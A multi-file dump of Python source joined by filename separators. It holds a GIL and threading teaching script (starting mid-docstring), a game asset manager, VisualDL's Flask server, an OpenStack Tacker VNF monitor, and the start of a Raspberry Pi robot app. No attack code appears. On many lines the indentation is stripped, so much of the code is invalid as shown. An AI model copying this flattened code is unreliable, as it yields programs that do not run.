   1. A thread acquires the GIL when it starts executing, which blocks other threads;
      after running for a while it releases the GIL so other threads get a chance to use the CPU.
   2. check_interval: the CPython interpreter periodically checks the GIL and forces the
      current thread to release it, so that other threads have an opportunity to run.
3. Thread safety in Python (not guaranteed at the application level)
   A statement such as "n += 1" compiles to several bytecode operations, so it is not thread-safe:
   >>> import dis
   >>> dis.dis(foo)
   LOAD_GLOBAL 0 (n)
   LOAD_CONST 1 (1)
   INPLACE_ADD
   STORE_GLOBAL 0 (n)
   The GIL was designed mainly to make life easier for the CPython interpreter developers,
   not for Python application programmers; as Python users we still need tools such as locks
   to guarantee thread safety (see the sketch right below this docstring).
'''
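# Illustrative sketch (the helper below is added for explanation and is not part of the original
# script): disassembling an increment of a global shows the LOAD / ADD / STORE sequence from the
# notes above. The GIL may be released between those bytecodes, which is why application-level
# code still needs a threading.Lock for correctness.
def _show_increment_bytecode():
    import dis  # local import keeps the sketch self-contained
    def bump():
        global n
        n += 1
    # Prints LOAD_GLOBAL / LOAD_CONST / INPLACE_ADD (BINARY_OP in Python 3.11+) / STORE_GLOBAL,
    # i.e. several separate bytecodes between which another thread can interleave.
    dis.dis(bump)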
import time
import concurrent.futures
import threading
import asyncio
def CountDown(n):
while n > 0:
n -= 1
def multipleThread(n):
    # split the countdown across two threads, start both, then wait for both to finish
    threads = [threading.Thread(target=CountDown, args=[n // 2]) for _ in range(2)]
    for th in threads:
        th.start()
    for th in threads:
        th.join()
async def asyCountDown(n):
while n > 0:
n -= 1
async def asyncThread(n):
    # await the created task so the countdown finishes before asyncio.run() returns
    await asyncio.create_task(asyCountDown(n))
# Thread safety must also be ensured at the application level
n = 0
lock = threading.Lock()
def foo():
    '''
    Thread safety must be ensured here
    '''
global n
# with lock:
n += 1
def test():
threads = []
for i in range(100):
t = threading.Thread(target=foo)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
print(n)
if __name__ == "__main__":
start_time = time.perf_counter()
CountDown(50000000)
end_time = time.perf_counter()
print('thread run time: ', end_time-start_time)
# start_time = time.perf_counter()
# multipleThread(100000000)
# end_time = time.perf_counter()
# print('multipleProcess run time: ', end_time-start_time)
start_time = time.perf_counter()
asyncio.run(asyncThread(50000000))
end_time = time.perf_counter()
print('asyncThread run time: ', end_time-start_time)
|
_assetmanager.py
|
# Released under the MIT License. See LICENSE for details.
#
"""Functionality related to managing cloud based assets."""
from __future__ import annotations
from typing import TYPE_CHECKING
from pathlib import Path
import threading
import urllib.request
import logging
import weakref
import time
import os
import sys
from efro import entity
if TYPE_CHECKING:
from bacommon.assets import AssetPackageFlavor
from typing import List
class FileValue(entity.CompoundValue):
"""State for an individual file."""
class State(entity.Entity):
"""Holds all persistent state for the asset-manager."""
files = entity.CompoundDictField('files', str, FileValue())
class AssetManager:
"""Wrangles all assets."""
_state: State
def __init__(self, rootdir: Path) -> None:
print('AssetManager()')
assert isinstance(rootdir, Path)
self.thread_ident = threading.get_ident()
self._rootdir = rootdir
self._started = False
if not self._rootdir.is_dir():
raise RuntimeError(f'Provided rootdir does not exist: "{rootdir}"')
self.load_state()
def __del__(self) -> None:
print('~AssetManager()')
if self._started:
logging.warning('AssetManager dying in a started state.')
def launch_gather(
self,
packages: List[str],
flavor: AssetPackageFlavor,
account_token: str,
) -> AssetGather:
"""Spawn an asset-gather operation from this manager."""
print('would gather', packages, 'and flavor', flavor, 'with token',
account_token)
return AssetGather(self)
def update(self) -> None:
"""Can be called periodically to perform upkeep."""
def start(self) -> None:
"""Tell the manager to start working.
This will initiate network activity and other processing.
"""
if self._started:
logging.warning('AssetManager.start() called on running manager.')
self._started = True
def stop(self) -> None:
"""Tell the manager to stop working.
All network activity should be ceased before this function returns.
"""
if not self._started:
logging.warning('AssetManager.stop() called on stopped manager.')
self._started = False
self.save_state()
@property
def rootdir(self) -> Path:
"""The root directory for this manager."""
return self._rootdir
@property
def state_path(self) -> Path:
"""The path of the state file."""
return Path(self._rootdir, 'state')
def load_state(self) -> None:
"""Loads state from disk. Resets to default state if unable to."""
print('ASSET-MANAGER LOADING STATE')
try:
state_path = self.state_path
if state_path.exists():
with open(self.state_path, encoding='utf-8') as infile:
self._state = State.from_json_str(infile.read())
return
except Exception:
logging.exception('Error loading existing AssetManager state')
self._state = State()
def save_state(self) -> None:
"""Save state to disk (if possible)."""
print('ASSET-MANAGER SAVING STATE')
try:
with open(self.state_path, 'w', encoding='utf-8') as outfile:
outfile.write(self._state.to_json_str())
except Exception:
logging.exception('Error writing AssetManager state')
class AssetGather:
"""Wrangles a gathering of assets."""
def __init__(self, manager: AssetManager) -> None:
assert threading.get_ident() == manager.thread_ident
self._manager = weakref.ref(manager)
# self._valid = True
print('AssetGather()')
# url = 'https://files.ballistica.net/bombsquad/promo/BSGamePlay.mov'
# url = 'http://www.python.org/ftp/python/2.7.3/Python-2.7.3.tgz'
# fetch_url(url,
# filename=Path(manager.rootdir, 'testdl'),
# asset_gather=self)
# print('fetch success')
thread = threading.Thread(target=self._run)
        thread.start()
def _run(self) -> None:
"""Run the gather in a background thread."""
print('hello from gather bg')
# First, do some sort of.
# @property
# def valid(self) -> bool:
# """Whether this gather is still valid.
# A gather becomes in valid if its originating AssetManager dies.
# """
# return True
def __del__(self) -> None:
print('~AssetGather()')
def fetch_url(url: str, filename: Path, asset_gather: AssetGather) -> None:
"""Fetch a given url to a given filename for a given AssetGather.
"""
# pylint: disable=consider-using-with
import socket
# We don't want to keep the provided AssetGather alive, but we want
# to abort if it dies.
assert isinstance(asset_gather, AssetGather)
# weak_gather = weakref.ref(asset_gather)
# Pass a very short timeout to urllib so we have opportunities
# to cancel even with network blockage.
req = urllib.request.urlopen(url, timeout=1)
file_size = int(req.headers['Content-Length'])
print(f'\nDownloading: {filename} Bytes: {file_size:,}')
def doit() -> None:
time.sleep(1)
print('dir', type(req.fp), dir(req.fp))
print('WOULD DO IT', flush=True)
# req.close()
# req.fp.close()
    threading.Thread(target=doit).start()
with open(filename, 'wb') as outfile:
file_size_dl = 0
block_sz = 1024 * 1024 * 1000
time_outs = 0
while True:
try:
data = req.read(block_sz)
except ValueError:
import traceback
traceback.print_exc()
print('VALUEERROR', flush=True)
break
except socket.timeout:
print('TIMEOUT', flush=True)
# File has not had activity in max seconds.
if time_outs > 3:
print('\n\n\nsorry -- try back later')
os.unlink(filename)
raise
print('\nHmmm... little issue... '
'I\'ll wait a couple of seconds')
time.sleep(3)
time_outs += 1
continue
# We reached the end of the download!
if not data:
sys.stdout.write('\rDone!\n\n')
sys.stdout.flush()
break
file_size_dl += len(data)
outfile.write(data)
percent = file_size_dl * 1.0 / file_size
status = f'{file_size_dl:20,} Bytes [{percent:.2%}] received'
sys.stdout.write('\r' + status)
sys.stdout.flush()
print('done with', req.fp)
|
app.py
|
#!/user/bin/env python
# Copyright (c) 2017 VisualDL Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =======================================================================
import os
import time
import sys
import multiprocessing
import threading
import re
import webbrowser
import requests
from visualdl import __version__
from visualdl.utils import update_util
from flask import (Flask, Response, redirect, request, send_file, make_response)
from flask_babel import Babel
import visualdl.server
from visualdl.server.api import create_api_call
from visualdl.server.args import (ParseArgs, parse_args)
from visualdl.server.log import info
from visualdl.server.template import Template
SERVER_DIR = os.path.join(visualdl.ROOT, 'server')
support_language = ["en", "zh"]
default_language = support_language[0]
server_path = os.path.abspath(os.path.dirname(sys.argv[0]))
template_file_path = os.path.join(SERVER_DIR, "./dist")
mock_data_path = os.path.join(SERVER_DIR, "./mock_data/")
check_live_path = '/alive'
def create_app(args):
# disable warning from flask
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
app = Flask('visualdl', static_folder=None)
app.logger.disabled = True
# set static expires in a short time to reduce browser's memory usage.
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 30
app.config['BABEL_DEFAULT_LOCALE'] = default_language
babel = Babel(app)
api_call = create_api_call(args.logdir, args.model, args.cache_timeout)
update_util.PbUpdater().start()
public_path = args.public_path
api_path = public_path + '/api'
@babel.localeselector
def get_locale():
lang = args.language
if not lang or lang not in support_language:
lang = request.accept_languages.best_match(support_language)
return lang
if not args.api_only:
template = Template(
os.path.join(server_path, template_file_path),
PUBLIC_PATH=public_path.lstrip('/'),
API_TOKEN_KEY=''
)
@app.route('/')
def base():
return redirect(public_path, code=302)
@app.route('/favicon.ico')
def favicon():
icon = os.path.join(template_file_path, 'favicon.ico')
if os.path.exists(icon):
return send_file(icon)
return 'file not found', 404
@app.route(public_path + '/')
def index():
lang = get_locale()
if lang == default_language:
return redirect(public_path + '/index', code=302)
lang = default_language if lang is None else lang
return redirect(public_path + '/' + lang + '/index', code=302)
@app.route(public_path + '/<path:filename>')
def serve_static(filename):
return template.render(filename if re.search(r'\..+$', filename) else filename + '.html')
@app.route(api_path + '/<path:method>')
def serve_api(method):
data, mimetype, headers = api_call(method, request.args)
return make_response(Response(data, mimetype=mimetype, headers=headers))
@app.route(check_live_path)
def check_live():
return '', 204
return app
def _open_browser(app, index_url):
while True:
# noinspection PyBroadException
try:
requests.get(index_url)
break
except Exception:
time.sleep(0.5)
webbrowser.open(index_url)
def wait_until_live(args: ParseArgs):
url = 'http://{host}:{port}'.format(host=args.host, port=args.port)
while True:
try:
requests.get(url + check_live_path)
info('Running VisualDL at http://%s:%s/ (Press CTRL+C to quit)', args.host, args.port)
if args.host == 'localhost':
info('Serving VisualDL on localhost; to expose to the network, use a proxy or pass --host 0.0.0.0')
if args.api_only:
info('Running in API mode, only %s/* will be served.', args.public_path + '/api')
break
except Exception:
time.sleep(0.5)
if not args.api_only and args.open_browser:
webbrowser.open(url + args.public_path)
def _run(args):
args = ParseArgs(**args)
info('\033[1;33mVisualDL %s\033[0m', __version__)
app = create_app(args)
threading.Thread(target=wait_until_live, args=(args,)).start()
app.run(debug=False, host=args.host, port=args.port, threaded=False)
def run(logdir=None, **options):
args = {
'logdir': logdir
}
args.update(options)
p = multiprocessing.Process(target=_run, args=(args,))
p.start()
return p.pid
def main():
args = parse_args()
_run(args)
if __name__ == '__main__':
main()
|
monitor.py
|
# Copyright 2015 Intel Corporation.
# All Rights Reserved.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import inspect
import threading
import time
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from tacker.common import driver_manager
from tacker import context as t_context
from tacker.db.common_services import common_services_db_plugin
from tacker.plugins.common import constants
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
OPTS = [
cfg.IntOpt('check_intvl',
default=10,
help=_("check interval for monitor")),
]
CONF.register_opts(OPTS, group='monitor')
def config_opts():
return [('monitor', OPTS),
('tacker', VNFMonitor.OPTS),
('tacker', VNFAlarmMonitor.OPTS),
('tacker', VNFAppMonitor.OPTS)]
def _log_monitor_events(context, vnf_dict, evt_details):
_cos_db_plg = common_services_db_plugin.CommonServicesPluginDb()
_cos_db_plg.create_event(context, res_id=vnf_dict['id'],
res_type=constants.RES_TYPE_VNF,
res_state=vnf_dict['status'],
evt_type=constants.RES_EVT_MONITOR,
tstamp=timeutils.utcnow(),
details=evt_details)
class VNFMonitor(object):
"""VNF Monitor."""
_instance = None
_hosting_vnfs = dict() # vnf_id => dict of parameters
_status_check_intvl = 0
_lock = threading.RLock()
OPTS = [
cfg.ListOpt(
'monitor_driver', default=['ping', 'http_ping'],
help=_('Monitor driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
def __new__(cls, boot_wait, check_intvl=None):
if not cls._instance:
cls._instance = super(VNFMonitor, cls).__new__(cls)
return cls._instance
def __init__(self, boot_wait, check_intvl=None):
self._monitor_manager = driver_manager.DriverManager(
'tacker.tacker.monitor.drivers',
cfg.CONF.tacker.monitor_driver)
self.boot_wait = boot_wait
if check_intvl is None:
check_intvl = cfg.CONF.monitor.check_intvl
self._status_check_intvl = check_intvl
LOG.debug('Spawning VNF monitor thread')
threading.Thread(target=self.__run__).start()
def __run__(self):
        while True:
time.sleep(self._status_check_intvl)
with self._lock:
for hosting_vnf in self._hosting_vnfs.values():
if hosting_vnf.get('dead', False):
LOG.debug('monitor skips dead vnf %s', hosting_vnf)
continue
try:
self.run_monitor(hosting_vnf)
except Exception as ex:
LOG.exception("Unknown exception: Monitoring failed "
"for VNF '%s' due to '%s' ",
hosting_vnf['id'], ex)
@staticmethod
def to_hosting_vnf(vnf_dict, action_cb):
return {
'id': vnf_dict['id'],
'management_ip_addresses': jsonutils.loads(
vnf_dict['mgmt_url']),
'action_cb': action_cb,
'vnf': vnf_dict,
'monitoring_policy': jsonutils.loads(
vnf_dict['attributes']['monitoring_policy'])
}
def add_hosting_vnf(self, new_vnf):
LOG.debug('Adding host %(id)s, Mgmt IP %(ips)s',
{'id': new_vnf['id'],
'ips': new_vnf['management_ip_addresses']})
new_vnf['boot_at'] = timeutils.utcnow()
with self._lock:
self._hosting_vnfs[new_vnf['id']] = new_vnf
attrib_dict = new_vnf['vnf']['attributes']
mon_policy_dict = attrib_dict['monitoring_policy']
evt_details = (("VNF added for monitoring. "
"mon_policy_dict = %s,") % (mon_policy_dict))
_log_monitor_events(t_context.get_admin_context(), new_vnf['vnf'],
evt_details)
def delete_hosting_vnf(self, vnf_id):
LOG.debug('deleting vnf_id %(vnf_id)s', {'vnf_id': vnf_id})
with self._lock:
hosting_vnf = self._hosting_vnfs.pop(vnf_id, None)
if hosting_vnf:
LOG.debug('deleting vnf_id %(vnf_id)s, Mgmt IP %(ips)s',
{'vnf_id': vnf_id,
'ips': hosting_vnf['management_ip_addresses']})
def run_monitor(self, hosting_vnf):
mgmt_ips = hosting_vnf['management_ip_addresses']
vdupolicies = hosting_vnf['monitoring_policy']['vdus']
vnf_delay = hosting_vnf['monitoring_policy'].get(
'monitoring_delay', self.boot_wait)
for vdu in vdupolicies.keys():
if hosting_vnf.get('dead'):
return
policy = vdupolicies[vdu]
for driver in policy.keys():
params = policy[driver].get('monitoring_params', {})
vdu_delay = params.get('monitoring_delay', vnf_delay)
if not timeutils.is_older_than(
hosting_vnf['boot_at'],
vdu_delay):
continue
actions = policy[driver].get('actions', {})
if 'mgmt_ip' not in params:
params['mgmt_ip'] = mgmt_ips[vdu]
driver_return = self.monitor_call(driver,
hosting_vnf['vnf'],
params)
LOG.debug('driver_return %s', driver_return)
if driver_return in actions:
action = actions[driver_return]
hosting_vnf['action_cb'](action)
def mark_dead(self, vnf_id):
self._hosting_vnfs[vnf_id]['dead'] = True
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._monitor_manager.invoke(
driver, method, **kwargs)
def monitor_get_config(self, vnf_dict):
return self._invoke(
vnf_dict, monitor=self, vnf=vnf_dict)
def monitor_url(self, vnf_dict):
return self._invoke(
vnf_dict, monitor=self, vnf=vnf_dict)
def monitor_call(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
class VNFAppMonitor(object):
"""VNF App monitor"""
OPTS = [
cfg.ListOpt(
'app_monitor_driver', default=['zabbix'],
help=_('App monitoring driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
def __init__(self):
self._application_monitor_manager = driver_manager.DriverManager(
'tacker.tacker.app_monitor.drivers',
cfg.CONF.tacker.app_monitor_driver)
def _create_app_monitoring_dict(self, dev_attrs, mgmt_url):
app_policy = 'app_monitoring_policy'
appmonitoring_dict = ast.literal_eval(dev_attrs[app_policy])
vdulist = appmonitoring_dict['vdus'].keys()
for vduname in vdulist:
temp = ast.literal_eval(mgmt_url)
appmonitoring_dict['vdus'][vduname]['mgmt_ip'] = temp[vduname]
return appmonitoring_dict
def create_app_dict(self, context, vnf_dict):
dev_attrs = vnf_dict['attributes']
mgmt_url = vnf_dict['mgmt_url']
return self._create_app_monitoring_dict(dev_attrs, mgmt_url)
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._application_monitor_manager.\
invoke(driver, method, **kwargs)
def add_to_appmonitor(self, applicationvnfdict, vnf_dict):
        vdunode = list(applicationvnfdict['vdus'].keys())
        driver = applicationvnfdict['vdus'][vdunode[0]]['name']
kwargs = applicationvnfdict
return self._invoke(driver, vnf=vnf_dict, kwargs=kwargs)
class VNFAlarmMonitor(object):
"""VNF Alarm monitor"""
OPTS = [
cfg.ListOpt(
'alarm_monitor_driver', default=['ceilometer'],
help=_('Alarm monitoring driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
# get alarm here
def __init__(self):
self._alarm_monitor_manager = driver_manager.DriverManager(
'tacker.tacker.alarm_monitor.drivers',
cfg.CONF.tacker.alarm_monitor_driver)
def update_vnf_with_alarm(self, plugin, context, vnf, policy_dict):
triggers = policy_dict['triggers']
alarm_url = dict()
for trigger_name, trigger_dict in triggers.items():
params = dict()
params['vnf_id'] = vnf['id']
params['mon_policy_name'] = trigger_name
driver = trigger_dict['event_type']['implementation']
# TODO(Tung Doan) trigger_dict.get('actions') needs to be used
policy_action = trigger_dict.get('action')
# covers both a missing 'action' key and an empty action list
if not policy_action:
_log_monitor_events(t_context.get_admin_context(),
vnf,
"Alarm not set: policy action missing")
return
# Other backend policies with the construct (policy, action)
# ex: (SP1, in), (SP1, out)
def _refactor_backend_policy(bk_policy_name, bk_action_name):
policy = '%(policy_name)s-%(action_name)s' % {
'policy_name': bk_policy_name,
'action_name': bk_action_name}
return policy
for index, policy_action_name in enumerate(policy_action):
filters = {'name': policy_action_name}
bkend_policies =\
plugin.get_vnf_policies(context, vnf['id'], filters)
if bkend_policies:
bkend_policy = bkend_policies[0]
if bkend_policy['type'] == constants.POLICY_SCALING:
cp = trigger_dict['condition'].\
get('comparison_operator')
scaling_type = 'out' if cp == 'gt' else 'in'
policy_action[index] = _refactor_backend_policy(
policy_action_name, scaling_type)
# Support multiple actions, e.g. respawn%notify
action_name = '%'.join(policy_action)
params['mon_policy_action'] = action_name
alarm_url[trigger_name] =\
self.call_alarm_url(driver, vnf, params)
details = "Alarm URL set successfully: %s" % alarm_url
_log_monitor_events(t_context.get_admin_context(),
vnf,
details)
return alarm_url
def process_alarm_for_vnf(self, vnf, trigger):
"""call in plugin"""
params = trigger['params']
mon_prop = trigger['trigger']
alarm_dict = dict()
alarm_dict['alarm_id'] = params['data'].get('alarm_id')
alarm_dict['status'] = params['data'].get('current')
trigger_name, trigger_dict = list(mon_prop.items())[0]
driver = trigger_dict['event_type']['implementation']
return self.process_alarm(driver, vnf, alarm_dict)
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._alarm_monitor_manager.invoke(
driver, method, **kwargs)
def call_alarm_url(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
def process_alarm(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
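# Naming conventions used by update_vnf_with_alarm() above, shown with assumed
# sample values (a scaling policy named 'SP1' and two alarm actions):
#   _refactor_backend_policy('SP1', 'out') -> 'SP1-out'   (comparison_operator 'gt')
#   _refactor_backend_policy('SP1', 'in')  -> 'SP1-in'    (any other operator)
#   '%'.join(['respawn', 'notify'])        -> 'respawn%notify'  (mon_policy_action)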
|
app_File.py
|
#!/usr/bin/env python3
##jwc o #!/usr/bin/env python
# Key Notes
#
# jwc 2020-0519 Convert from Crickit_Adafruit to RoboHat_4tronix
# jwc 2020-0519 Use 'gpiozero' for noise-free servo-control
# jwc Add 'robohat.init()'
# jwc Make sure 'servod' copied in from 'RoboHat' dir
# jwc Using 'robohat's' servo causes pan to jitter/run cool and tilt to get hot
# jwc 2020-1213 Port in '~/01-Jwc/2020-1205-0640-RpiRover1-DayDevelops/RpiRover1-master' for Slider Ux, db directory
# jwc 2020-1223 AiCam Gen 2.0: StreamVideoToWebBrowser-AdrianRosebrock
# * KEYESTUDIO Fisheye Wide Angle Lens 5MP 1080p OV5647 Sensor Module Supports Night Vision: 130-degrees
# * Smraza 4 Camera Module 5 Megapixels 1080p OV5647 Sensor Adjustable Focus Wide Angle Fish-Eye Camera: 160-degrees
# jwc 2020-1230 AiCam Gen 2.1: 11j-OpenCv-DetectArucoMarkers-FreeBlog/opencv-detect-aruco
from importlib import import_module
import os
import sys
import signal
import threading
import time
import json
import math
from flask import Flask, render_template, request, Response
# jwc n from gevent.wsgi import WSGIServer
# jwc from gevent.pywsgi import WSGIServer
from waitress import serve
# * https://flask.palletsprojects.com/en/1.1.x/deploying/wsgi-standalone/ : Gevent
from gevent.pywsgi import WSGIServer
##jwc n from yourapplication import app
## jwc replace w/ PiUpTimeUps: # * BatteryUps: GeekPi/52pi.com: EP-0118
## jwc replace w/ PiUpTimeUps: # * https://wiki.52pi.com/index.php/UPS_(With_RTC_%26_Coulometer)_For_Raspberry_Pi_SKU:_EP-0118
## jwc replace w/ PiUpTimeUps: #
## jwc replace w/ PiUpTimeUps: from ina219 import INA219
## jwc replace w/ PiUpTimeUps: from ina219 import DeviceRangeError
## jwc replace w/ PiUpTimeUps: resistor_Shunt_OHM_GLOBAL = 0.05
## jwc replace w/ PiUpTimeUps:
## jwc replace w/ PiUpTimeUps: # Define method to read information from coulometer.
## jwc replace w/ PiUpTimeUps: batteryUps_ClObj_Global = INA219(resistor_Shunt_OHM_GLOBAL)
## jwc replace w/ PiUpTimeUps: batteryUps_ClObj_Global.configure()
##jwc replace w/ PiUpTimeUps: def batteryUps_Read_Fn(config_In):
##jwc replace w/ PiUpTimeUps: global batteryUps_ClObj_Global
##jwc replace w/ PiUpTimeUps:
##jwc replace w/ PiUpTimeUps: config_In._batteryUps_Input_V = batteryUps_ClObj_Global.voltage()
##jwc replace w/ PiUpTimeUps: ##jwc y print("*** DEBUG: _batteryUps_Input_V: %.3f V" % config_In._batteryUps_Input_V)
##jwc replace w/ PiUpTimeUps: print(f"*** DEBUG: _batteryUps_Input_V: {config_In._batteryUps_Input_V:.2f} V", end='')
##jwc replace w/ PiUpTimeUps: try:
##jwc replace w/ PiUpTimeUps: config_In._batteryUps_Output_V = batteryUps_ClObj_Global.shunt_voltage()
##jwc replace w/ PiUpTimeUps: ##jwc y print("*** DEBUG: _batteryUps_Output_V: %.3f mV" % config_In._batteryUps_Output_V)
##jwc replace w/ PiUpTimeUps: print(f" // _batteryUps_Output_V: {config_In._batteryUps_Output_V:.2f} mV", end='')
##jwc replace w/ PiUpTimeUps:
##jwc replace w/ PiUpTimeUps: config_In._batteryUps_Temp_C = batteryUps_ClObj_Global.current()
##jwc replace w/ PiUpTimeUps: ##jwc y print("*** DEBUG: _batteryUps_Temp_C: %.3f mA" % config_In._batteryUps_Temp_C)
##jwc replace w/ PiUpTimeUps: print(f" // _batteryUps_Temp_C: {config_In._batteryUps_Temp_C:.2f} mA", end='')
##jwc replace w/ PiUpTimeUps:
##jwc replace w/ PiUpTimeUps: config_In._batteryUps_Temp_F = batteryUps_ClObj_Global.power()
##jwc replace w/ PiUpTimeUps: ##jwc y print("*** DEBUG: _batteryUps_Temp_F: %.3f mW" % config_In._batteryUps_Temp_F)
##jwc replace w/ PiUpTimeUps: print(f" // _batteryUps_Temp_F: {config_In._batteryUps_Temp_F:.2f} mW)")
##jwc replace w/ PiUpTimeUps: except DeviceRangeError as e:
##jwc replace w/ PiUpTimeUps: print(e)
import piUpTimeUps_2pt0__AlchemyPower
##jwc y import config_Global_File as config_Global_File
##jwc ? import config_Global_File
##jwc o import config_Global_File as cfg
import config_Global_File
##jwc o import io_wrapper as hw
##jwc y import io_Driver_File
##jwc m import io_Driver_Simulator_File as io_Driver_File
import io_Driver_Simulator_File as io_Driver_File
## jwc o import RPi.GPIO as GPIO
##jwc y from gpiozero import Servo
##jwc o from adafruit_crickit import crickit
##jwc y import robohat
##jwc y robohat.init()
import autoPHat_SparkFun_Driver_File
autoPHat_SparkFun_Driver_File.init()
##jwc y autoPHat_SparkFun_Driver_File.runTest()
##jwc y 2021-0124: Comment out to silence dcmotors test: TODO uncomment later: autoPHat_SparkFun_Driver_File.runTest_Quick()
autoPHat_SparkFun_Driver_File.runTest_Quick()
##jwc n global servo_01_Pan_Degrees
##jwc n servo_01_Pan_Degrees = 90
autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_Fn( config_Global_File.servo_01_Pan_Degrees )
autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_Fn( config_Global_File.servo_02_Tilt_Degrees )
autoPHat_SparkFun_Driver_File.servo_Arm_03_Fn( config_Global_File.servo_03_Degrees )
##jwc o # make two variables for the motors to make code shorter to type
##jwc o # Right-Side
##jwc o motor_1 = crickit.dc_motor_1
##jwc o # Left-Side
##jwc o motor_2 = crickit.dc_motor_2
##jwc 'crickit' o servo_1 = crickit.servo_1
##jwc 'crickit' o servo_2 = crickit.servo_2
#jwc Due to 'robohat.py' using 'GPIO.setmode(GPIO.BOARD)', then convert from BCM Pin# to Board Pin#
##jwc o myGPIO=24
##jwc o myGPIO_02=25
##jwc o Board#: myGPIO = 18
##jwc o Board#: myGPIO_02 = 22
# jwc: Convert from Board# to BCM#
myGPIO = 24
myGPIO_02 = 25
# gpiozero.exc.GPIOPinInUse: pin 6 is already in use by <gpiozero.PWMOutputDevice object on pin GPIO6, active_high=True, is_active=True>
# gpiozero.exc.GPIOPinInUse: pin 18 is already in use by <gpiozero.PWMOutputDevice object on pin GPIO18, active_high=True, is_active=True>
##jwc bcm# y myGPIO = 6
##jwc bcm#24y myGPIO_02 = 18
##jwc ? myGPIO = 24
##jwc n myGPIO_02 = 25 ## Became hot after 5'
##jwc n myGPIO_02 = 6 ## hot also
## jwc ? myGPIO_02 = 18
##jwc o myCorrection=0.45
#jwc remove correction for smaller range
myCorrection=0.00
maxPW=(2.0+myCorrection)/1000
minPW=(1.0-myCorrection)/1000
##jwc y servo = Servo(myGPIO)
##jwc y servo_02 = Servo(myGPIO_02)
##jwc y servo = Servo(myGPIO,min_pulse_width=minPW,max_pulse_width=maxPW)
##jwc y servo_02 = Servo(myGPIO_02,min_pulse_width=minPW,max_pulse_width=maxPW)
##jwc n servo.mid()
##jwc n servo_02.mid()
##jwc 'crickit' ##jwc o GPIO.setmode(GPIO.BCM)
##jwc 'crickit' ##jwc o GPIO.setwarnings(False)
##jwc 'crickit'
##jwc 'crickit'
##jwc 'crickit' ##jwc o servo = 22, 22 is Board Pin #
##jwc 'crickit' ##jwc y servo = 22 # jwc bcm=25
##jwc 'crickit' ##jwc o servo_Pin = 18 # jwc bcm=24
##jwc 'crickit' ##jwc o servo_02_Pin = 22 # jwc bcm=25
##jwc 'crickit'
##jwc 'crickit' ##jwc o bug: GPIO.setmode(GPIO.BOARD).py
##jwc 'crickit' ##jwc o GPIO.setmode(GPIO.BOARD)
##jwc 'crickit' ##TODO jwc jittery: GPIO.setup(servo_Pin, GPIO.OUT)
##jwc 'crickit' ##jwc o GPIO.setup(servo_02_Pin, GPIO.OUT)
##jwc 'crickit'
##jwc 'crickit' # jwc: 5ms = 0.005s -> 1 / 200 = 200Hz
##jwc 'crickit' ##TODO jwc jittery: servo = GPIO.PWM(servo_Pin, 200) # frequency is 500Hz, so each pulse is 5ms wide
##jwc 'crickit' ##jwc o servo_02 = GPIO.PWM(servo_02_Pin, 200) # frequency is 500Hz, so each pulse is 5ms wide
##jwc 'crickit'
##jwc 'crickit' # servos will be fully left at 0.5ms, centred at 1.5ms and fully right at 2.5ms
##jwc 'crickit' #
##jwc 'crickit' servoPwm_PositionMax = 50/5
##jwc 'crickit' servoPwm_PositionMid = 150/5
##jwc 'crickit' servoPwm_PositionMin = 250/5
##jwc 'crickit'
##jwc 'crickit' ##TODO jwc jitter: servo.start(servoPwm_PositionMid) # start it at 50% - should be servoPwm_PositionMid of servo
##jwc 'crickit' servo_02.start(servoPwm_PositionMid) # start it at 50% - should be servoPwm_PositionMid of servo
##jwc 'crickit' #p.ChangeDutyCycle(100)
##jwc o AiCam Gen 1
##jwc o
##jwc o Raspberry Pi camera module (requires picamera package)
##jwc o from camera_pi import Camera_File
##jwc o
##jwc o def gen(camera):
##jwc o """Video streaming generator function."""
##jwc o while True:
##jwc o frame = camera.get_frame()
##jwc o yield (b'--frame\r\n'
##jwc o b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
##jwc o
##jwc o @app_Cl_Ob.route('/video_feed')
##jwc o def video_feed():
##jwc o """Video streaming route. Put this in the src attribute of an img tag."""
##jwc o return Response(gen(Camera()), mimetype='multipart/x-mixed-replace; boundary=frame')
# AiCam Gen 2.0
#
# import camera driver
##jwc o if os.environ.get('CAMERA'):
##jwc o camera_Cl = import_module('camera_' + os.environ['CAMERA']).camera_Cl
##jwc o print("*** DEBUG: Camera-02a: camera_" + os.environ['CAMERA'])
##jwc o else:
##jwc o ##jwc o from camera import Camera_File
##jwc o # Default to most sophisticated tech
##jwc o from camera_OpenCv_File import camera_Cl
##jwc o print("*** DEBUG: Camera-02b: camera_opencv")
